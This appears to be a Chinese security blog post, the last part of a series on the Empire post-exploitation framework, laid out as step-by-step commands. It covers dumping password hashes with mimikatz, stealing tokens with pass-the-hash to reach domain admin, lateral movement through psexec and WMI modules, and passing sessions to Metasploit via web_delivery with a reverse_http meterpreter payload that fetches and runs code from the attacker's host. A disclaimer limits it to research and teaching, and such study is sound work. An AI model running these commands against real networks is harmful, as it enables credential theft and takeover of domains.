#001 获取密码hash
1、内置mimikatz:
mimikatz #执行会有点缓慢,执行成功即可抓取hash
2、creds命令:
creds
creds<空格>+<双击tab键> 可以看到扩展命令
当内网很复杂,hash很多时,可以通过export导出为csv文件
crds export /root/hash #会自动添加文件后缀
结果如下:
#002 横向移动模块
1、令牌窃取配合hash传递:
①执行mimikatz后
creds #列出所有Empire获取到的密码
②当发现列举出的creds中,有域高权限用户时,使用hash传递方式攻击:
pth
然后就能看见PID号,窃取该PID进程的令牌即可
steal_token
即可成功获取域管权限
2、横向移动常用模块:
①invoke-psexec:
usemodule lateral_movement/invoke_psexec
set ComputerName <目标计算机名>
set Listener <监听器名称>
成功会返回目标机器的agent会话
②invoke-wmi:
usemodule lateral_movement/invoke_wmi
set ComputerName <目标计算机名>
set Listener <监听器名称>
成功会返回目标机器的agent会话
③其他模块根据实际情况选用即可
usemodule lateral_movement/ #tab键列出模块
#003 转为MSF会话
Invoke-MetasploitPayload<-->web_delivery(MSF):
①MSF执行:
use exploit/multi/script/web_delivery
set target 2
set payload windows/meterpreter/reverse_http
set lhost
set lpotr <监听端口>
exploit
②Empire执行:
usemodule code_execution/invoke_metasploitpayload
set URL
execute
执行成功后,MSF会上线一个新的meterpreter会话
点个赞和在看吧,欢迎转发!
本文始发于微信公众号(哈拉少安全小队):【Empire系列完结】横向移动相关
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论